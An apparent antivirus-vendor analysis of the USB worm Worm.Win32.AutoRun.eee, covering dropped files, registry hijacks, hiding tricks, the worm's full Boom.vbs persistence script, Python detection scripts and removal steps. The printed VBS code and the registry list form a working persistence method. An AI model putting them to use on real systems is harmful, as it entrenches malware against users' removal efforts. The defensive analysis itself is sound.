Basic information
- Chinese name: Worm.Win32.AutoRun.eee
- Virus type: worm
- Disclosure: fully public
- Threat level: 4
Virus tags
Chinese name: USB-drive parasite variant (隨身碟寄生蟲變種)
File MD5: E4EFBDEEEDF0294E380578767D7217F3
File size: 237,568 bytes
Affected systems: Windows 98 and later
Development tool: Microsoft Visual Basic 5.0 / 6.0
Packer: none
Virus description
The virus uses several start-up methods, so it is still launched even after its autostart entry has been deleted from the registry. It hides its files twice over: it makes the "hide protected operating system files" folder option unusable and hides files with the chosen extensions. It masquerades and uses image hijacking: it hijacks the images of several critical system processes and disguises its files as a system update and as the registry editor. Its files carry a folder icon, and it creates system files with the same names as the virus files in the system backup folder so that users take them for normal system files. It keeps the machine in its apparent original state by tuning the boot and shutdown settings so that start-up and shutdown get faster and the user does not notice the slowdown an infection would otherwise cause. Finally, it uses process interlocking: once fully running it creates several processes that protect one another.
Behaviour analysis
Local behaviour:
1. After execution the file drops the following files:
%DriveLetter%\autorun.inf
%Temp%\~DF7634.tmp
%Temp%\~DF8840.tmp
%Temp%\~DF9A47.tmp
%DriveLetter%\MS-DOS.com
%Windir%\Cursors\Boom.vbs
%Windir%\Fonts\Fonts.exe
%Windir%\Fonts\tskmgr.exe
%Windir%\Media\rndll32.pif
%Windir%\pchealth\Global.exe
%Windir%\pchealth\helpctr\binaries\HelpHost.com
%Windir%\system\KEYBOARD.exe
%System32%\dllcache\autorun.inf
%System32%\dllcache\Default.exe
%System32%\dllcache\Global.exe
%System32%\dllcache\Recycler.{645FF040-5081-101B-9F08-00AA002F954E}\Global.exe
%System32%\dllcache\Recycler.{645FF040-5081-101B-9F08-00AA002F954E}\svchost.exe
%System32%\dllcache\Recycler.{645FF040-5081-101B-9F08-00AA002F954E}\system.exe
%System32%\dllcache\rndll32.exe
%System32%\dllcache\svchost.exe
%System32%\dllcache\tskmgr.exe
%System32%\drivers\drivers.cab.exe
%System32%\regedit.exe
2. Registry modifications:
HKEY_CURRENT_USER\Control Panel\Desktop\SCRNSAVE.EXE
New: String: "C:\WINDOWS\pchealth\helpctr\binaries\HelpHost.com"
Old: String: "C:\WINDOWS\system32\logon.scr"
Description: sets the screen saver to the virus file
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced\ShowSuperHidden
New: DWORD: 0 (0)
Old: DWORD: 1 (0x1)
Description: makes hidden files invisible in folder views
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\MSCFile\Shell\Open\Command\@
New: String: "C:\WINDOWS\Fonts\Fonts.exe"
Old: String: %SystemRoot%\system32\mmc.exe "%1"
Description: runs the virus when mmc.exe is entered in the Run command
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\regfile\shell\open\command\@
New: String: "C:\WINDOWS\pchealth\Global.exe"
Old: String: "regedit.exe "%1""
Description: runs the virus when regedit.exe is entered in the Run command
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\RunOnce\@
Value: String: "C:\WINDOWS\system32\dllcache\Default.exe"
Description: adds an autostart entry
HKEY_CURRENT_USER\Software\Microsoft\Windows\ShellNoRoam\MUICache\C:\WINDOWS\system32\dllcache\Recycler.{645FF040-5081-101B-9F08-00AA002F954E}\Global.exe
Value: String: "Global"
Description: adds an autostart entry
HKEY_CURRENT_USER\Software\Microsoft\Windows\ShellNoRoam\MUICache\C:\WINDOWS\system32\dllcache\Recycler.{645FF040-5081-101B-9F08-00AA002F954E}\svchost.exe
Value: String: "svchost"
Description: adds an autostart entry
HKEY_CURRENT_USER\Software\Microsoft\Windows\ShellNoRoam\MUICache\C:\WINDOWS\system32\dllcache\Recycler.{645FF040-5081-101B-9F08-00AA002F954E}\system.exe
Value: String: "system"
Description: adds an autostart entry
HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\System\Scripts\Logoff\0\0\Script
Value: String: "C:\WINDOWS\Cursors\Boom.vbs"
Description: launches the virus script at logoff
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\auto.exe\Debugger
Value: String: "C:\WINDOWS\system32\drivers\drivers.cab.exe"
Description: adds an image hijacking entry
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\boot.exe\Debugger
Value: String: "C:\WINDOWS\Fonts\fonts.exe"
Description: adds an image hijacking entry
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\msconfig.exe\Debugger
Value: String: "C:\WINDOWS\Media\rndll32.pif"
Description: adds an image hijacking entry
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\procexp.exe\Debugger
Value: String: "C:\WINDOWS\pchealth\helpctr\binaries\HelpHost.com"
Description: adds an image hijacking entry
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\taskmgr.exe\Debugger
Value: String: "C:\WINDOWS\Fonts\tskmgr.exe"
Description: adds an image hijacking entry
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\policies\Explorer\Run\sys
Value: String: "C:\WINDOWS\Fonts\Fonts.exe"
Description: adds an autostart entry
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\@
Value: String: "C:\WINDOWS\system\KEYBOARD.exe"
Description: adds an autostart entry
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce\@
Value: String: "C:\WINDOWS\system32\dllcache\Default.exe"
Description: adds an autostart entry
HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows\System\Scripts\Shutdown\0\0\Script
Value: String: "C:\WINDOWS\Cursors\Boom.vbs"
Description: launches the virus script at shutdown
HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows\System\Scripts\Startup\0\0\Script
Value: String: "C:\WINDOWS\Cursors\Boom.vbs"
Description: launches the virus script at start-up
3. A VBS script re-copies the virus files and re-adds the autostart entries whenever the infected machine logs off, shuts down or starts up. The Boom.vbs file (line wrapping restored; analyst comments marked with '):
dim fs,rg
set fs = createobject("scripting.filesystemobject")
set rg = createobject("wscript.shell")
on error resume next
' .vbs association, screen-saver hijack and 30 s timeout
rg.regwrite "HKCR\.vbs\", "VBSFile"
rg.regwrite "HKCU\Control Panel\Desktop\SCRNSAVE.EXE", "C:\WINDOWS\pchealth\helpctr\binaries\HelpHost.com"
rg.regwrite "HKCU\Control Panel\Desktop\ScreenSaveTimeOut", "30"
' .msc and .reg shell handlers redirected to the virus
rg.regwrite "HKCR\MSCFile\Shell\Open\Command\", "C:\WINDOWS\pchealth\Global.exe"
rg.regwrite "HKCR\regfile\Shell\Open\Command\", "C:\WINDOWS\pchealth\Global.exe"
' Run / RunOnce autostart entries
rg.regwrite "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce\", "C:\WINDOWS\system32\dllcache\Default.exe"
rg.regwrite "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce\", "C:\WINDOWS\system32\dllcache\Default.exe"
rg.regwrite "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\", "C:\WINDOWS\system\KEYBOARD.exe"
rg.regwrite "HKEY_CLASSES_ROOT\MSCFile\Shell\Open\Command\", "C:\WINDOWS\Fonts\Fonts.exe"
' registers itself as a local Group Policy logoff script (per user) ...
rg.regwrite "HKCU\Software\Policies\Microsoft\Windows\System\Scripts\Logoff\0\DisplayName", "Local Group Policy"
rg.regwrite "HKCU\Software\Policies\Microsoft\Windows\System\Scripts\Logoff\0\FileSysPath", ""
rg.regwrite "HKCU\Software\Policies\Microsoft\Windows\System\Scripts\Logoff\0\GPO-ID", "LocalGPO"
rg.regwrite "HKCU\Software\Policies\Microsoft\Windows\System\Scripts\Logoff\0\GPOName", "Local Group Policy"
rg.regwrite "HKCU\Software\Policies\Microsoft\Windows\System\Scripts\Logoff\0\SOM-ID", "Local"
rg.regwrite "HKCU\Software\Policies\Microsoft\Windows\System\Scripts\Logoff\0\0\Parameters", ""
rg.regwrite "HKCU\Software\Policies\Microsoft\Windows\System\Scripts\Logoff\0\0\Script", "C:\WINDOWS\Cursors\Boom.vbs"
' ... and as shutdown and startup scripts (per machine)
rg.regwrite "HKLM\Software\Policies\Microsoft\Windows\System\Scripts\Shutdown\0\DisplayName", "Local Group Policy"
rg.regwrite "HKLM\Software\Policies\Microsoft\Windows\System\Scripts\Shutdown\0\FileSysPath", ""
rg.regwrite "HKLM\Software\Policies\Microsoft\Windows\System\Scripts\Shutdown\0\GPO-ID", "LocalGPO"
rg.regwrite "HKLM\Software\Policies\Microsoft\Windows\System\Scripts\Shutdown\0\GPOName", "Local Group Policy"
rg.regwrite "HKLM\Software\Policies\Microsoft\Windows\System\Scripts\Shutdown\0\SOM-ID", "Local"
rg.regwrite "HKLM\Software\Policies\Microsoft\Windows\System\Scripts\Shutdown\0\0\Parameters", ""
rg.regwrite "HKLM\Software\Policies\Microsoft\Windows\System\Scripts\Shutdown\0\0\Script", "C:\WINDOWS\Cursors\Boom.vbs"
rg.regwrite "HKLM\Software\Policies\Microsoft\Windows\System\Scripts\Startup\0\DisplayName", "Local Group Policy"
rg.regwrite "HKLM\Software\Policies\Microsoft\Windows\System\Scripts\Startup\0\FileSysPath", ""
rg.regwrite "HKLM\Software\Policies\Microsoft\Windows\System\Scripts\Startup\0\GPO-ID", "LocalGPO"
rg.regwrite "HKLM\Software\Policies\Microsoft\Windows\System\Scripts\Startup\0\GPOName", "Local Group Policy"
rg.regwrite "HKLM\Software\Policies\Microsoft\Windows\System\Scripts\Startup\0\SOM-ID", "Local"
rg.regwrite "HKLM\Software\Policies\Microsoft\Windows\System\Scripts\Startup\0\0\Parameters", ""
rg.regwrite "HKLM\Software\Policies\Microsoft\Windows\System\Scripts\Startup\0\0\Script", "C:\WINDOWS\Cursors\Boom.vbs"
' re-creates any virus file that was removed, from the copy kept as C:\WINDOWS\Help\microsoft.hlp
If Not fs.fileexists("C:\WINDOWS\Fonts\Fonts.exe") Then fs.copyfile ("C:\WINDOWS\Help\microsoft.hlp"), ("C:\WINDOWS\Fonts\Fonts.exe")
If Not fs.fileexists("C:\WINDOWS\pchealth\helpctr\binaries\HelpHost.com") Then fs.copyfile ("C:\WINDOWS\Help\microsoft.hlp"), ("C:\WINDOWS\pchealth\helpctr\binaries\HelpHost.com")
If Not fs.fileexists("C:\WINDOWS\pchealth\Global.exe") Then fs.copyfile ("C:\WINDOWS\Help\microsoft.hlp"), ("C:\WINDOWS\pchealth\Global.exe")
If Not fs.fileexists("C:\WINDOWS\system\KEYBOARD.exe") Then fs.copyfile ("C:\WINDOWS\Help\microsoft.hlp"), ("C:\WINDOWS\system\KEYBOARD.exe")
If Not fs.fileexists("C:\WINDOWS\system32\dllcache\Default.exe") Then fs.copyfile ("C:\WINDOWS\Help\microsoft.hlp"), ("C:\WINDOWS\system32\dllcache\Default.exe")
If Not fs.fileexists("C:\windows\system32\drivers\drivers.cab.exe") Then fs.copyfile ("C:\WINDOWS\Help\microsoft.hlp"), ("C:\windows\system32\drivers\drivers.cab.exe ")
If Not fs.fileexists("C:\windows\media\rndll32.pif ") Then fs.copyfile ("C:\WINDOWS\Help\microsoft.hlp"), ("C:\windows\media\rndll32.pif")
If Not fs.fileexists("C:\windows\fonts\tskmgr.exe") Then fs.copyfile ("C:\WINDOWS\Help\microsoft.hlp"), ("C:\windows\fonts\tskmgr.exe")
4. Multiple start-up methods:
The default screen saver %System32%\logon.scr is replaced by the virus file %Windir%\pchealth\helpctr\binaries\HelpHost.com and the screen-saver timeout is set to 30 s; the virus script %Windir%\Cursors\Boom.vbs is loaded as a Logoff, Shutdown and Startup script, which keeps the virus files and autostart entries intact; and the virus files are added to the machine start-up key HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run, the logged-on-user key HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce and the Explorer.exe load key HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\policies\Explorer\Run\sys.
5. Double file hiding:
After running, the virus marks the dropped files as hidden system files and modifies the registry so that protected operating-system files stay hidden: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced\ShowSuperHidden is set to off. Because the virus files mainly use the .EXE and .COM extensions, it also sets HKEY_LOCAL_MACHINE\SOFTWARE\Classes\comfile\NeverShowExt and HKEY_LOCAL_MACHINE\SOFTWARE\Classes\exefile\NeverShowExt so that those extensions are not displayed; even with the protected-system-files option turned back on, the true form of the virus files cannot be seen.
6. Masquerading plus image hijacking:
The virus names its dropped files regedit.exe, svchost.exe, msconfig.exe, tskmgr.exe, HelpHost.com and so on to pass them off as system files, so that users cannot tell them apart; it hijacks regedit.exe and mmc.exe when they are started from the Run command (cmd.exe) so that the virus file runs instead; and it image-hijacks the system files ctfmon.exe, msconfig.exe, taskmgr.exe and autorun.exe and the system utilities autoruns.exe and auto.exe, so that the virus runs whenever the system loads or the user runs any of these files.
7. Confusing the user:
The dropped files use a folder icon, misleading users into taking the virus for a folder and running it by mistake; the system files %system32%\taskmgr.exe and %system32%\rundll32.exe are copied into the system backup directory %System32%\dllcache and renamed tskmgr.exe and rndll32.pif respectively; together with the dropped files %Windir%\Fonts\tskmgr.exe and %Windir%\Media\rndll32.pif this completes the confusion.
8. Keeping the computer's original state:
Through registry changes the virus tunes the boot and shutdown settings so that start-up and shutdown get faster and the computer is not slowed down by the several running virus files. The changes are:
HKEY_CURRENT_USER\Control Panel\Desktop\AutoEndTasks
New: String: "1"
Old: String: ""
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Dfrg\BootOptimizeFunction\LcnEndLocation
New: String: "642218"
Old: String: "0"
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Dfrg\BootOptimizeFunction\LcnStartLocation
New: String: "550001"
Old: String: "0"
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Dfrg\BootOptimizeFunction\OptimizeComplete
New: String: "Yes"
Old: String: "No"
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Dfrg\BootOptimizeFunction\OptimizeError
New: String: " "
Old: String: "Not Run"
9. Process interlocking:
Once fully running, the virus creates the processes Global.exe, svchost.exe and system.exe, which protect one another.
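The registry techniques in sections 2 and 4 to 6 (IFEO Debugger hijacks, a non-.scr screen saver, redirected .reg/.msc shell handlers, local Group Policy scripts registered directly in the registry, ShowSuperHidden turned off, NeverShowExt added, autostart entries in data directories) can be hunted for in an exported hive instead of by reading the list by eye. The Python script below is an added example written for this page, not the vendor's tool: it parses a .reg export and reports each technique as a finding. It generalises beyond this sample (any IFEO Debugger that is not a known debugger is flagged, any screen saver that is not a .scr, any local policy script outside the GroupPolicy folder). The sample export is constructed from the values listed above plus two benign entries; the debugger allowlist and the list of suspect directories are assumptions for the example.

```python
"""Triage a Windows .reg export for the persistence and hiding techniques
described above.  Added example, not the vendor's tool.  Pass the export as
str (decode a UTF-16 .reg first); the sample below is constructed."""
import re
from collections import namedtuple

Finding = namedtuple("Finding", "rule key value")

# Directories where autostart programs do not normally live (assumed heuristic,
# mirroring the drop locations listed in section 1).
SUSPECT_DIRS = ("\\fonts\\", "\\cursors\\", "\\media\\", "\\help\\",
                "\\pchealth\\", "\\dllcache\\", "\\temp\\", "\\system\\")
# Debuggers that may legitimately sit in an IFEO Debugger value (assumed allowlist).
KNOWN_DEBUGGERS = {"windbg.exe", "cdb.exe", "ntsd.exe", "vsjitdebugger.exe"}
IFEO = "\\image file execution options\\"
POLICY_SCRIPTS = "\\software\\policies\\microsoft\\windows\\system\\scripts\\"
AUTOSTART_KEYS = ("\\currentversion\\run", "\\currentversion\\runonce",
                  "\\policies\\explorer\\run")

# Constructed .reg export: the write-up's values plus two benign entries.
SAMPLE_REG = r'''Windows Registry Editor Version 5.00

[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\taskmgr.exe]
"Debugger"="C:\\WINDOWS\\Fonts\\tskmgr.exe"

[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\procexp.exe]
"Debugger"="C:\\WINDOWS\\pchealth\\helpctr\\binaries\\HelpHost.com"

; benign, constructed: a developer's JIT debugger
[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\notepad.exe]
"Debugger"="C:\\Program Files\\Debugging Tools\\windbg.exe"

[HKEY_CURRENT_USER\Control Panel\Desktop]
"SCRNSAVE.EXE"="C:\\WINDOWS\\pchealth\\helpctr\\binaries\\HelpHost.com"
"ScreenSaveTimeOut"="30"

[HKEY_LOCAL_MACHINE\SOFTWARE\Classes\regfile\shell\open\command]
@="C:\\WINDOWS\\pchealth\\Global.exe"

[HKEY_LOCAL_MACHINE\SOFTWARE\Classes\MSCFile\Shell\Open\Command]
@="C:\\WINDOWS\\Fonts\\Fonts.exe"

[HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows\System\Scripts\Startup\0\0]
"Script"="C:\\WINDOWS\\Cursors\\Boom.vbs"
"Parameters"=""

[HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced]
"ShowSuperHidden"=dword:00000000

[HKEY_LOCAL_MACHINE\SOFTWARE\Classes\exefile]
"NeverShowExt"=""

[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\policies\Explorer\Run]
"sys"="C:\\WINDOWS\\Fonts\\Fonts.exe"

[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run]
@="C:\\WINDOWS\\system\\KEYBOARD.exe"
"ctfmon"="C:\\WINDOWS\\system32\\ctfmon.exe"
'''

VALUE_LINE = re.compile(r'^(?:@|"((?:[^"\\]|\\.)*)")=(.*)$')


def parse_reg(text):
    """Parse .reg text into {key: {value_name: value}}; the default value is named ""."""
    keys, current = {}, None
    for raw in text.splitlines():
        line = raw.strip()
        if not line or line.startswith(";"):
            continue
        if line.startswith("[") and line.endswith("]"):
            current = line[1:-1]
            keys.setdefault(current, {})
            continue
        m = VALUE_LINE.match(line)
        if m is None or current is None:
            continue
        name, data = m.group(1) or "", m.group(2)
        if len(data) >= 2 and data.startswith('"') and data.endswith('"'):
            value = re.sub(r"\\(.)", r"\1", data[1:-1])   # undo .reg escaping of \ and "
        elif data.lower().startswith("dword:"):
            value = int(data[6:], 16)
        else:
            value = data                                   # hex:/other types kept raw
        keys[current][name] = value
    return keys


def _basename(cmd):
    """Program file name from a command line such as '"C:\\x\\y.exe" -p %ld'."""
    return re.split(r"[\\/]", cmd)[-1].split()[0].strip('"') if cmd.strip() else ""


def triage(keys):
    """Return one Finding per technique occurrence found in the parsed export."""
    findings = []
    for key, values in keys.items():
        k = key.lower()
        for name, value in values.items():
            n, v = name.lower(), str(value).lower()
            if IFEO in k and n == "debugger":
                if _basename(v) not in KNOWN_DEBUGGERS:
                    findings.append(Finding("ifeo-hijack", key, value))
            elif k.endswith("control panel\\desktop") and n == "scrnsave.exe":
                if not v.endswith(".scr"):
                    findings.append(Finding("screensaver-hijack", key, value))
            elif k.endswith("regfile\\shell\\open\\command") and n == "":
                if "regedit.exe" not in v:
                    findings.append(Finding("regfile-handler-hijack", key, value))
            elif k.endswith("mscfile\\shell\\open\\command") and n == "":
                if "mmc.exe" not in v:
                    findings.append(Finding("mscfile-handler-hijack", key, value))
            elif POLICY_SCRIPTS in k and n == "script":
                if "\\grouppolicy\\" not in v:      # local GPO scripts normally live there
                    findings.append(Finding("policy-script-outside-gpo", key, value))
            elif k.endswith("explorer\\advanced") and n == "showsuperhidden":
                if value == 0:
                    findings.append(Finding("superhidden-disabled", key, value))
            elif k.endswith(("\\exefile", "\\comfile")) and n == "nevershowext":
                findings.append(Finding("extension-hidden", key, value))
            elif k.endswith(AUTOSTART_KEYS):
                if any(d in v for d in SUSPECT_DIRS):
                    findings.append(Finding("autostart-in-suspect-dir", key, value))
    return findings


if __name__ == "__main__":
    for f in triage(parse_reg(SAMPLE_REG)):
        print(f"{f.rule:26} {f.key}\n{'':26} -> {f.value!r}")
```

Run it against `reg export` output of the IFEO, Classes, Policies and Run keys from a suspect host; every finding maps back to one row of the registry list above, and the "Old" values in that list are what to restore.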
Note: %System32% is a variable path. The virus determines the location of the current System folder by querying the operating system.
%Windir%  the directory Windows is installed in
%DriveLetter%  the root of a logical drive
%ProgramFiles%  the default program installation directory
%HomeDrive%  the partition holding the currently booted system
%Documents and Settings%  the current user's documents root
%Temp%  \Documents and Settings\<current user>\Local Settings\Temp
%System32%  the system's System32 folder:
  Windows 2000/NT default install path: C:\Winnt\System32
  Windows 95/98/Me default install path: C:\Windows\System
  Windows XP default install path: C:\Windows\System32
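The placeholder note above and the drop list in section 1 can be turned into an offline check of a mounted image. The Python below is an added example, not the vendor's tool: it expands the %Windir%, %System32% and %DriveLetter% placeholders, tests which of the listed drop paths exist in a volume listing, and parses the autorun.inf from the removable drive's root to show what the shell would launch on insertion. The directory listing and the autorun.inf contents are constructed for the example; the write-up names %DriveLetter%\autorun.inf and %DriveLetter%\MS-DOS.com but does not give the .inf contents, so pairing the two is an assumption.

```python
"""Offline triage of a mounted volume for the drop paths of section 1 and the
AutoRun spreading vector.  Added example, not the vendor's tool; the listing
and the autorun.inf below are constructed."""
import re

# Drop paths from section 1 of the write-up (placeholders as written there).
DROP_PATHS = [
    r"%DriveLetter%\autorun.inf",
    r"%DriveLetter%\MS-DOS.com",
    r"%Windir%\Cursors\Boom.vbs",
    r"%Windir%\Fonts\Fonts.exe",
    r"%Windir%\Fonts\tskmgr.exe",
    r"%Windir%\Media\rndll32.pif",
    r"%Windir%\pchealth\Global.exe",
    r"%Windir%\pchealth\helpctr\binaries\HelpHost.com",
    r"%Windir%\system\KEYBOARD.exe",
    r"%System32%\dllcache\Default.exe",
    r"%System32%\dllcache\Recycler.{645FF040-5081-101B-9F08-00AA002F954E}\Global.exe",
    r"%System32%\drivers\drivers.cab.exe",
]

# Placeholder values for the examined host (constructed; on a real image take
# them from the mounted volume, see the note on %System32% above).
ENV = {
    "%windir%": "C:\\WINDOWS",
    "%system32%": "C:\\WINDOWS\\system32",
    "%temp%": "C:\\Documents and Settings\\user\\Local Settings\\Temp",
}

# Constructed listing of a USB stick (E:) and the infected system volume (C:).
LISTING = [
    r"E:\autorun.inf", r"E:\MS-DOS.com", r"E:\holiday.jpg",
    r"C:\WINDOWS\Cursors\Boom.vbs", r"C:\WINDOWS\Fonts\Fonts.exe",
    r"C:\WINDOWS\Fonts\tskmgr.exe", r"C:\WINDOWS\Fonts\arial.ttf",
    r"C:\WINDOWS\system32\taskmgr.exe",
]

# Constructed autorun.inf: the write-up lists MS-DOS.com beside autorun.inf on
# the drive root, so this sample points every launch key at it (assumption).
SAMPLE_AUTORUN_INF = """[autorun]
open=MS-DOS.com
shellexecute=MS-DOS.com
shell\\open\\Command=MS-DOS.com
shell\\explore\\Command=MS-DOS.com
icon=%SystemRoot%\\system32\\SHELL32.dll,4
"""

PLACEHOLDER = re.compile(r"%[A-Za-z0-9 ]+%")


def expand(path, env):
    """Replace the write-up's %Name% placeholders, case-insensitively."""
    return PLACEHOLDER.sub(lambda m: env.get(m.group(0).lower(), m.group(0)), path)


def parse_autorun_inf(text):
    """Return (key, command) pairs from [autorun] that make the shell run a program."""
    launches, section = [], None
    for raw in text.splitlines():
        line = raw.strip()
        if not line or line[0] in ";#":
            continue
        if line.startswith("[") and line.endswith("]"):
            section = line[1:-1].lower()
            continue
        if section != "autorun" or "=" not in line:
            continue
        key, _, cmd = line.partition("=")
        key, cmd = key.strip().lower(), cmd.strip()
        if cmd and (key in ("open", "shellexecute")
                    or (key.startswith("shell\\") and key.endswith("\\command"))):
            launches.append((key, cmd))
    return launches


def triage_volume(listing, autorun_text, drive, env):
    """Which known drop paths exist, and what an autorun.inf on `drive` would launch."""
    present = {p.lower() for p in listing}
    full_env = dict(env, **{"%driveletter%": drive})
    found = [p for p in (expand(d, full_env) for d in DROP_PATHS) if p.lower() in present]
    launches = []
    for key, cmd in parse_autorun_inf(autorun_text):
        target = cmd.split()[0].strip('"')            # the program is the first token
        if not re.match(r"^[A-Za-z]:\\", target):     # relative paths resolve to the drive root
            target = drive + "\\" + target.lstrip("\\")
        launches.append({"key": key, "target": target, "exists": target.lower() in present})
    return {"dropped_files": found, "autorun_launches": launches}


if __name__ == "__main__":
    result = triage_volume(LISTING, SAMPLE_AUTORUN_INF, "E:", ENV)
    for path in result["dropped_files"]:
        print("drop path present:", path)
    for item in result["autorun_launches"]:
        print(f"autorun {item['key']} -> {item['target']} (exists={item['exists']})")
```

On a real case, build the listing with os.walk over the mount point and treat any open, shellexecute or shell\...\command key in a removable drive's autorun.inf as a finding in its own right: a data stick has no reason to launch a program on insertion, and current Windows versions ignore those keys for USB media anyway.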
Removal
1. Use Antiy Ghostbusters (安天防線) to remove this virus completely (recommended).
2. For manual removal, delete the corresponding files and restore the related system settings as described in the behaviour analysis:
(1) Forcibly terminate the processes running from the following paths:
%System32%\dllcache\Recycler.{645FF040-5081-101B-9F08-00AA002F954E}\Global.exe
%System32%\dllcache\Recycler.{645FF040-5081-101B-9F08-00AA002F954E}\svchost.exe
%System32%\dllcache\Recycler.{645FF040-5081-101B-9F08-00AA002F954E}\system.exe
(2) Forcibly delete the virus files:
%DriveLetter%\autorun.inf
%Temp%\~DF7634.tmp
%Temp%\~DF8840.tmp
%Temp%\~DF9A47.tmp
%DriveLetter%\MS-DOS.com
%Windir%\Cursors\Boom.vbs
%Windir%\Fonts\Fonts.exe
%Windir%\Fonts\tskmgr.exe
%Windir%\Media\rndll32.pif
%Windir%\pchealth\Global.exe
%Windir%\pchealth\helpctr\binaries\HelpHost.com
%Windir%\system\KEYBOARD.exe
%System32%\dllcache\autorun.inf
%System32%\dllcache\Default.exe
%System32%\dllcache\Global.exe
%System32%\dllcache\Recycler.{645FF040-5081-101B-9F08-00AA002F954E}\Global.exe
%System32%\dllcache\Recycler.{645FF040-5081-101B-9F08-00AA002F954E}\svchost.exe
%System32%\dllcache\Recycler.{645FF040-5081-101B-9F08-00AA002F954E}\system.exe
%System32%\dllcache\rndll32.exe
%System32%\dllcache\svchost.exe
%System32%\dllcache\tskmgr.exe
%System32%\drivers\drivers.cab.exe
%System32%\regedit.exe
(3) Restore the registry entries the virus modified and delete the entries it added:
HKEY_CURRENT_USER\Control Panel\Desktop\SCRNSAVE.EXE
New: String: "C:\WINDOWS\pchealth\helpctr\binaries\HelpHost.com"
Old: String: "C:\WINDOWS\system32\logon.scr"
Description: sets the screen saver to the virus file
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced\ShowSuperHidden
New: DWORD: 0 (0)
Old: DWORD: 1 (0x1)
Description: makes hidden files invisible in folder views
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\MSCFile\Shell\Open\Command\@
New: String: "C:\WINDOWS\Fonts\Fonts.exe"
Old: String: %SystemRoot%\system32\mmc.exe "%1"
Description: runs the virus when mmc.exe is entered in the Run command
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\regfile\shell\open\command\@
New: String: "C:\WINDOWS\pchealth\Global.exe"
Old: String: "regedit.exe "%1""
Description: runs the virus when regedit.exe is entered in the Run command
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\RunOnce\@
Value: String: "C:\WINDOWS\system32\dllcache\Default.exe"
Description: adds an autostart entry
HKEY_CURRENT_USER\Software\Microsoft\Windows\ShellNoRoam\MUICache\C:\WINDOWS\system32\dllcache\Recycler.{645FF040-5081-101B-9F08-00AA002F954E}\Global.exe
Value: String: "Global"
Description: adds an autostart entry
HKEY_CURRENT_USER\Software\Microsoft\Windows\ShellNoRoam\MUICache\C:\WINDOWS\system32\dllcache\Recycler.{645FF040-5081-101B-9F08-00AA002F954E}\svchost.exe
Value: String: "svchost"
Description: adds an autostart entry
HKEY_CURRENT_USER\Software\Microsoft\Windows\ShellNoRoam\MUICache\C:\WINDOWS\system32\dllcache\Recycler.{645FF040-5081-101B-9F08-00AA002F954E}\system.exe
Value: String: "system"
Description: adds an autostart entry
HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\System\Scripts\Logoff\0\0\Script
Value: String: "C:\WINDOWS\Cursors\Boom.vbs"
Description: launches the virus script at logoff
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\auto.exe\Debugger
Value: String: "C:\WINDOWS\system32\drivers\drivers.cab.exe"
Description: adds an image hijacking entry
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\boot.exe\Debugger
Value: String: "C:\WINDOWS\Fonts\fonts.exe"
Description: adds an image hijacking entry
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\msconfig.exe\Debugger
Value: String: "C:\WINDOWS\Media\rndll32.pif"
Description: adds an image hijacking entry
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\procexp.exe\Debugger
Value: String: "C:\WINDOWS\pchealth\helpctr\binaries\HelpHost.com"
Description: adds an image hijacking entry
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\taskmgr.exe\Debugger
Value: String: "C:\WINDOWS\Fonts\tskmgr.exe"
Description: adds an image hijacking entry
